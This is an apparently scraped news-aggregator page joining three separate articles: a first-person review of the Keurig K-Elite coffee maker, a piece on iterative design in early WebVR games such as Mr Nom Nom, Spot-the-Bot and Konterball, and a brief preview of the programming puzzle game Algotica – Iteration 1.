  • Keurig coffee machines are already mainstays in homes and offices across the United States, but this latest model promises to be the most modern iteration yet.
  • While I’m still not thrilled by the environmental impact of those K-Cup pods, it is the case that this particular coffee maker offers much more customization than previous Keurigs.
  • Perhaps the most compelling function is the Brew Over Ice option, which allows you to make cold yet fully flavored coffee during the summer month (or the winter — whatever your heart desires).
  • The machine itself will cost you $ 170, but don’t forget about the cost of all those K-Cups you’ll have to buy.

If the sound of coffee beans grinding isn’t the soothing melody you’d like to wake up to in the morning, but the smell of coffee is what it takes to get you out of bed, Keurig’s line of coffee makers is likely the right choice for your kitchen. For years, the company has been delivering easy-to-use machines that require as little work as possible to make a cup of coffee — after all, it’s the first thing in the morning. Do you really have the mental capacity to think all that much?

And while simplicity has always been at the heart of Keurig machines, that straightforwardness has also come with some drawbacks. You can’t do much customization when you’re just putting a K-Cup into a Keurig, and there also hasn’t historically been much variation when it comes to how big of a cup of coffee you could make. But this all changes with the introduction of the Keurig K-Elite coffee maker.

I’ll be the first to say that I’m generally not the biggest fan of these instant coffee makers. Not only did they suffer from the aforementioned lack of personalization when it came to my morning cup of joe, but I also couldn’t (and still can’t, really) get over the environmental impact of those K-Cups. Sure, you can separate out the pod components to recycle them separately, but that creates a hassle that the Keurig is supposed to eliminate. But luckily, Keurig has already started selling recyclable K-Cups, and by 2020, the company promises that 100% of its pods will be, in fact, eco-friendly. (You can also find plenty of highly reviewed reusable K-Cup coffee filters on Amazon.)

And when it comes to the customization aspect, that’s where the new K-Elite coffee maker comes in. When Keurig says that its new machine delivers “the most beverage customization in any Keurig single cup coffee maker model,” it’s telling the truth.

There are a few standout features of the K-Elite that I found to be quite useful. As far as taste is concerned, there’s a Strong Brew button that does indeed up the strength and taste of your coffee’s flavor, at least when compared to a cup I brewed without selecting the Strong option.

Then, there’s the all-important Iced Setting, which allows you to brew coffee over ice without ending up with the watered-down taste that you normally get when you end up pouring your hot coffee over a few frozen cubes. Instead, I found the coffee to be flavor forward, but blessedly cold. Sure, it’s not as good as cold brew that you might get from your neighborhood coffee shop, but it certainly does the trick. And best of all, this setting only requires the touch of a button, too — to avoid any confusion, the button reads “ICED.” And if you’ve a particularly sensitive palette, you may find that the ability to adjust your brew temperature between 187 and 192 degrees Fahrenheit can also make a difference in your coffee’s flavor.

This new Keurig also boasts a large 75-ounce water reservoir, which means that you can make up to eight cups of coffee before having to refill again. The Keurig I had in college certainly didn’t have this luxury, and I was constantly running back and forth between a sink and my coffee maker to ensure I had enough caffeine for the day. That said, the K-Elite also comes with the option to brew a wide range of cup sizes, all the way from four to 12 ounces. You’ll select these sizes based on the associated icons on the machine. One thing to note — the icons don’t actually tell you exactly how much coffee you’re getting, but for the record, it’s four, six, eight, 10, and 12 ounces.

One of my favorite features of the K-Elite actually had nothing to do with coffee at all. I was a huge fan of the hot water on demand function, which is located right next to the STRONG button on the machine. Rather than having to get out a kettle, I can just turn to my Keurig and have it dispense hot water for my tea or oatmeal. That’s actually even more efficient than the under-a-minute brew time the machine promises.

I’ve never found Keurigs to be particularly loud, but the K-Elite’s Quiet Brew Technology claims to minimize noise when the coffee maker is in use. That comes in handy if you leverage the Auto On feature, which was extremely handy when it came to ensuring that my Keurig was on and ready to go at exactly 6:30 a.m. And seeing as it only takes a minute to brew coffee, that meant that I basically had my coffee in hand at 6:31. Similarly, you can automatically shut off your Keurig to save energy once you know you’ve had your last cup of caffeine for the day.

All in all, if you’re looking for a straightforward and easy-to-use coffee machine, it’s hard to go wrong with Keurig. The K-Elite will set you back $170, and comes in Brushed Silver or Brushed Slate.

Why iteration is the key to great WebVR games https://briefnews.eu/why-iteration-is-the-key-to-great-webvr-games/ https://briefnews.eu/why-iteration-is-the-key-to-great-webvr-games/#respond Mon, 29 May 2017 07:53:09 +0000 http://briefnews.eu/why-iteration-is-the-key-to-great-webvr-games/

I like to encourage an iterative approach to designing immersive games, which happens if developers and studios simply afford themselves the space and opportunity to experiment in order to discover how their concept can be designed with effective hooks that get players to play repeatedly.

Earlier this month I published an article that positioned WebVR gaming as the sweet spot the VR industry should be prioritizing. I then followed up to criticize the knee-jerk approach many developers and studios automatically take when building games and content with high fidelity as the central frame.

WebVR, of course, I held up high as the “oppressed” lingua franca of VR!

Let’s take a closer look at the iterative approach taken by three pioneering studios that developed the first generation of WebVR games. Each of these three cases were originally showcased on Google’s WebVR Experiments when it debuted back in April.

First up is Mr Nom Nom by Zurich-based Etter Studio, where the player transforms into a donut tasked with wrapping its ‘fashionable’ scarf around very hungry characters, trapping them by completing a circle around them. It was developed by a team of six people working across three countries: Switzerland, Germany, and Hong Kong.

Christian Etter, the studio’s founder and game director for Mr Nom Nom, described the iterative process to building it:

“We had some interesting prototypes, a system which allows to modularly build very basic geometrical characters and then the system would animate the characters generatively. Which worked incredibly well since the animation was much better and smarter than if it would have been done manually. Out of this prototype we slowly built the game, taking many different directions.”

It’s telling to point out that Etter was quite the VR skeptic prior to his studio’s foray into WebVR.

“Previously I have been quite critical of VR, because of the expensive and heavy hardware requirements and therefore thought it’s only for a small group of well-off tech enthusiasts. And frankly, VR didn’t appear very useful other than for things such as flight simulators. But by enabling WebVR via the browser would bring VR seamlessly to a large audience — it seemed like a good idea to make it more accessible and hence we wanted to push in this direction too and were curious to experiment with this new standard.” Etter told me.

Next up is Spot-the-Bot by U.S.-based Hook Studios, a social two-player game that allows you to team up with friends in a collaborative race against time. While “player one” is immersed in a virtual world filled with robots and parts, “player two” watches on using his mobile or desktop screen, serving as a spotter by helping player one to, you guessed it, “spot the bot” in VR.

It’s a clever and novel approach that takes advantage of WebVR’s unique feature of allowing users to play either with a VR headset or without one. But that they’ve actually assigned and fixed the roles according to immersive vs screen is a pretty cool but surprising twist in design for me, and highlights how the very nature of WebVR offers a variety of new possibilities in cross-platform gameplay.

“We started by prototyping a variety of gameplay mechanisms around creating an experience that was simple, social, collaborative and could take place in a shared space. To further those goals, and inspired by social games like Keep Talking and Nobody Explodes, we focused on asymmetrical gameplay: dividing up both the information and interaction. This also provided a secondary benefit of simplifying our networking code, not requiring us to synch up complex information like physics simulations or animation frames. From there we settled on the concept for what became Spot-the-Bot, surrounding one player with a bunch of similar looking things and giving the other player a single one to describe, in this case: robots.” Brad Nawrocki, Director of Creative Technology at Hook Studios, told me.

Last but not least is Konterball by Vienna-based studio wild. This sleek two-player Ping Pong rendition has crazy game modes and a bold visual style. It’s designed from head to toe with WebVR’s progressive enhancement strategy in mind, which means that it’s fully responsive to smartphone sensors (wave it around in the air) or when your mouse on your desktop, and therefore makes ‘getting into the game’ virtually frictionless.

“The game is playable with your regular smartphone sensors or your mouse on desktop, all the way up to Cardboard, Daydream and HTC Vive/Occulus. We had to consider this in developing the game mechanics and controls as well as we didn’t want an HTC Vive player to have any advantage over someone with a desktop computer or cardboard. Therefore we decided that where possible, you can play the game only by moving your head or through device sensors. The only exception had to be desktop.” Thomas Ragger, Partner & Tech Director at Wild, told me.

WebVR games, particularly casual titles like shooters, puzzle, and arcade, can take as little as days or a few weeks to conceive and create, and with these generous timelines in mind developers or studios can enjoy moving fast and breaking things, which I believe is the best way to gradually reveal the right formula that makes each particular game appealing and addictive in its own unique way – and yet, of course, in low fidelity.

These are the projects that need to be churned out in large supply so that we can evolve our understanding of what makes VR experiences tick, stick, and compel us all to slot in some time in our daily lives to play fun immersive games. It’s the functionality that we learn here, through quick-and-dirty iteration and by the gravity of large numbers, that trumps everything else. And that’s the formula that will trigger mass adoption.

Algotica – Iteration 1 Teaches Basics Of Programming Through Guiding Cute Robots https://briefnews.eu/algotica-iteration-1-teaches-basics-of-programming-through-guiding-cute-robots/ https://briefnews.eu/algotica-iteration-1-teaches-basics-of-programming-through-guiding-cute-robots/#respond Fri, 07 Apr 2017 00:37:31 +0000 http://briefnews.eu/algotica-iteration-1-teaches-basics-of-programming-through-guiding-cute-robots/ unnamed.jpg

Algotica – Iteration 1 aims to teach players how to program, something that immediately makes me, and probably a lot of there people, very nervous. The idea of programming is daunting to a lot of folks, but this game aims to make it approachable and simple, having players guide a cute robot through colorful worlds of puzzles using the basics of programming. It’s looking like a good place to start getting those skills, and a striking puzzler to boot.

Algotica – Iteration 1‘s story is about the relationship between Lony, our adorable robot buddy, the developer, and you, as the player. Your job here is to help Lony get to the end of each area, following the rules and logic of Algotica. As you guide it, you’ll learn more about the digital world within your computer, as well as how to give Lony commands to follow that will lead it through obstacles and past the odd presences that are hiding in your hard drive.

Those commands you give Lony are a hint at how programming works, but dolled up as a fun puzzler. By setting up a series of steps for Lony to follow, Algotica – Iteration 1 is looking to give you the basics of programming, having you break down every step you want the robot to take, then see where you’ve given poor instructions until you create a proper path for it to follow. It’s something a lot of games have promised before, but even if I don’t learn a thing from it, Algotica – Iteration 1 promises a gorgeous, bright, and imaginative world to wander through while I try to pick up some skills.

Algotica – Iteration 1 is available for $ 9.99 on Steam. For more information on the game and developer Alexander Khoroshavin, you can follow them on Facebook and Twitter.
